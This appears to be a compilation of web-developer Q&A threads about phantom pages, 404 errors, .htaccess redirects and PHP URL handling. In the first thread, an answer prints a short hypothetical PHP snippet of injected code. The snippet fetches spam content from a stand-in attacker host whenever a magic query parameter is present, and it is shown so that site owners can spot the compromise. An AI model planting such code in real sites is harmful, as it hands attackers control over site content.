Someone had changed my .htaccess file, and I have removed their changes.
But I still have phantom pages like this:
http://www.biztalk-training.com/?puqr=usoe
I don't have any 404.php, 404.shtml, or 404.html pages.
I checked cPanel for redirects on 404, and it looked empty (but it would have created a 404.shtml if I had filled it in).
If I type in something like this in the browser, I get a 404:
http://biztalk-training.com/anything.html
I'm looking for what to kill, remove, or fix to get rid of the phantom pages. I'm a developer (on other platforms) with moderate familiarity with PHP and cPanel sites. I'm used to seeing domainname.com/progname.php?parm=test, and I know how that works. But I don't know how ?puqr=usoe is producing content on my site. They have created other similar pages, which I discovered by doing a site: search on Google.
Thanks,
Neal Walters
Have you checked your index page? Under normal circumstances, http://www.example.com/?foo=bar will pass the query string (?foo=bar) to the index of example.com and will not produce a 404.
If these malcontents got write access to your server - and it sounds like they did - they could have easily modified your index page.
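For illustration, this is the kind of injected code to look for near the top of index.php. It is a hypothetical sketch (the parameter name and the remote host are made up), but it shows how a query string like ?puqr=usoe can produce content that doesn't correspond to any real page on your site:

<?php
// Hypothetical injected snippet: when the magic query parameter is present,
// fetch spam content from the attacker's server and serve it in place of the site.
if (isset($_GET['puqr'])) {
    echo file_get_contents('http://attacker.example/spam.php?key=' . urlencode($_GET['puqr']));
    exit;
}

Also check any files the index includes (templates, configuration, footer), since payloads like this are often hidden a few includes deep.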
I'm working on an old project based on Joomla 1.5. Most of its code was written in core PHP, but it does have SEO URLs. I'm required to remove dead links (about 2000 URLs) from the site, as they are lowering our organic reach.
When I opened each of them, they showed me the site's 404 error page. I couldn't figure out what was wrong with that. After all, that's why we have 404 pages, right? To display an error when a link is not found on our server?
I tried cleaning up the server's cache and even purging expired cache after reading some tutorials. Since that doesn't seem to help, I'm not sure what to do. Any help?
Btw, site is at www.parentune.com
and an example dead link is: http://www.parentune.com/parenting-blog/category/Adoption/latest
You don't have anything to remove, as those pages no longer exist on your site.
You have to create 301 redirects from the old URLs to the new ones to help search engines crawl your updated content.
A 301 redirect example (placed in the site's .htaccess on Apache) is:
Redirect 301 /oldpage.html /newpage.html
Good Luck!
As I didn't have any new URLs to redirect those old URLs to, but did have the list of reported URLs in an Excel file, what I did was read the Excel file into an array and check whether $_SERVER['REQUEST_URI'] was in that array (obviously, all the URLs in the array have to be relative to the index page). If the URL was found in the array, I simply redirected to the homepage.
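A minimal sketch of that approach, assuming the Excel list has been exported to a plain text file with one site-relative URL per line (the file name dead-urls.txt is an assumption; reading .xlsx directly would need a library such as PhpSpreadsheet):

<?php
// Load the list of dead URLs (one per line, relative to the site root).
$deadUrls = array_map('trim', file('dead-urls.txt'));

// If the requested URL is on the list, permanently redirect to the homepage.
if (in_array($_SERVER['REQUEST_URI'], $deadUrls, true)) {
    header('Location: /', true, 301);
    exit;
}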
I then cross-checked on brokenlinkcheck.com, and it no longer reported those URLs as 404s. So it seems the approach worked as a solution! :D
I recently made some major changes to an ecommerce website, including its URL structure. The URL to view a product is rewritten by .htaccess and contains a short product description that, if changed, will not affect the results on the page.
example: www.Example.com/staticFolder/non-deterministic-product-details/MODEL#.html
Now in the error log file I am seeing bingbot requesting pages like example.com/non-deterministic-product-details
Our sitemaps don't link to this page, and I am not able to find any bad links on our pages. Has anyone else had problems with bingbot doing this? I found another question, "Bingbot causing 404 errors", that was locked for being random. Is it more likely that I am doing something wrong? Should I avoid using pseudo-directories in my .htaccess?
-Thanks
There's nothing requiring that spiders stick only to link-crawling. It's entirely possible the bot is guessing URLs similar to known ones in the hope that it'll find something.
At any rate, I wouldn't worry about it unless you know it's following a bad link. It's quite normal to get lots of requests for non-existent pages.
I am creating an application in PHP.
One thing I want to do is make it so that if a user types in www.example.com/app/rrr.php, where app is the main directory of my application and rrr.php does not exist, the application either goes nowhere or uses an ErrorDocument in .htaccess to redirect back to the previous page. Thus far the only way I have been able to get this working is to add this to my .htaccess:
ErrorDocument 404 C:\Users\Chris\Desktop\wamp\www\Master\errorcode.php
When I try to go to a page that does not exist (by typing it into the address bar), the program does not attempt to go to it. On a page that does exist (if I type in a PHP file that I have made), the program advances normally. My problem is that I doubt this will work for users who install the application themselves, and I was wondering if anyone had ideas on how to make this work for everyone.
I couldn't fully understand your question, but here's what I think:
You should direct the user to a 404 page that checks whether there is a referer. If there is, show a link alongside the 404 message, something like "You might want to go back"; if there is no referer, just show the plain 404 page.
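A minimal sketch of such a 404 page, assuming it lives at the document root as errorcode.php (the file name and wording are assumptions):

<?php
// errorcode.php: send a real 404 status, then offer a way back
// if the browser told us where the visitor came from.
header('HTTP/1.1 404 Not Found');

echo '<h1>404 - Page Not Found</h1>';

if (!empty($_SERVER['HTTP_REFERER'])) {
    $back = htmlspecialchars($_SERVER['HTTP_REFERER'], ENT_QUOTES);
    echo '<p><a href="' . $back . '">You might want to go back</a></p>';
}

For the install-anywhere problem: ErrorDocument takes a URL path relative to the document root, not a filesystem path, so ErrorDocument 404 /errorcode.php will work on any machine, unlike the hard-coded C:\ path above.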
Say I have a website http://site.com. When a user visits a non-existent page http://site.com/whatever.html, a default 404 page http://site.com/default.php is displayed.
How can I get what the user tried to reach? (whatever.html in this case).
Is this a common feature?
It's in the Apache/Nginx access and error logs.
You can grep the log file for 404 responses.
The answer might vary depending upon the server that you are using. For common servers like Apache and Nginx, if you type in http://site.com/whatever.html and whatever.html doesn't exist, the content of the 404 page (set in the server configuration) will be displayed, but the URL in the address bar will remain whatever.html.
If you want to pass parameters to your 404 page, you can try something like a rewrite rule with a regex to capture the matched value and pass it to the 404 page, but I can't give you an exact answer since it depends upon which server you are using. Do let us know if this works or if it's what you were looking for; I'll try to help more.
Using $_SERVER['REQUEST_URI'], you should be able to get the path the user requested.
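For example, a default.php along these lines would show the path that triggered the 404. This is a minimal sketch for Apache, where $_SERVER['REQUEST_URI'] still holds the original request (e.g. /whatever.html) even while the ErrorDocument handler generates the response:

<?php
// default.php: report which URL the visitor actually requested.
header('HTTP/1.1 404 Not Found');

$requested = htmlspecialchars($_SERVER['REQUEST_URI'], ENT_QUOTES);
echo '<p>Sorry, ' . $requested . ' does not exist on this site.</p>';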
I have a problem.
I am moving a system from one server to another, and I came across a peculiar problem. There are some pages placed in a subfolder, like these:
xttp://test.domain.com/admin/oders.php
xttp://test.domain.com/admin/users.php
xttp://test.domain.com/admin/whatever.php
Now, when I move around the pages via a simple menu of links, I get correct hits most of the time. But from time to time I end up on, say:
xttp://test.domain.com/admin/admin/oders.php - which obviously causes a 404.
When I go back to the previous page and press the link again, it works all right. Also, when I hover over the links, they always show proper paths, regardless of whether I am about to get a 404 or not. All links are dynamically generated by the scripts, but they worked perfectly on the old server, and as I say, to the naked eye it all looks OK, right until I press the link.
Does anyone have an idea where to look for the bug, or which tool to use to see what is happening when I press the link? URL rewriting? Domain configuration? I am at a loss.
It sounds like the scripts are getting confused between these three forms:
[xttp://test.domain.com]/admin/file.php
admin/file.php
file.php
Without seeing how the URLs are generated it's impossible to say how this is happening.
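That said, the usual culprit is relative resolution: a link written as admin/oders.php on a page that itself lives under /admin/ resolves to /admin/admin/oders.php, exactly the broken URL above. Generating root-relative links (with a leading slash) avoids this, since they resolve the same way from any page. A minimal sketch, assuming the menu is built in PHP (the array contents are assumptions):

<?php
// Root-relative URLs (leading slash) resolve identically from any page.
// A relative 'admin/oders.php' emitted from a page already inside /admin/
// would resolve to /admin/admin/oders.php - the broken URL above.
$menu = array(
    'Orders' => '/admin/oders.php',
    'Users'  => '/admin/users.php',
);

foreach ($menu as $label => $url) {
    echo '<a href="' . htmlspecialchars($url, ENT_QUOTES) . '">' . $label . '</a> ';
}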